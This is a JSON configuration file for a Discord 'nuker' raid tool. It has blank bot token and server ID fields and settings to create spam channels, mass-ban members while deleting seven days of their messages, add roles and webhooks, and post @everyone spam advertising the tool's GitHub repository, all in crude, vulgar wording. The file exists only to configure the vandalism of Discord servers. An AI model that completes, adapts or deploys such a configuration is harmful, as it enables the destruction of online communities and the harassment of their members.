{
    "token":"",
    "guildid":"",

    "spamchannel" : {
        "name":"P U S S Y N U K E R ON TOP BITCHES",
        "type":0
        },

    "ban" : {
            "delete_message_days": 7,
            "reason": "AYU IS BACK"
        },

    "createrole" : {
        "hoist": "true",
        "name": "P U S S Y N U K E R V1",
        "mentionable": "true",
        "color":16746752,
        "permissions": 1
        },

    "webhookname" : {
        "name": "AYU IS BACK"
    },

    "spamcontent": {"content": "@everyone @here P U S S Y N U K E R ON TOP ---> https://github.com/xznz/Ayu-X-Nuker-V1/ "}



}
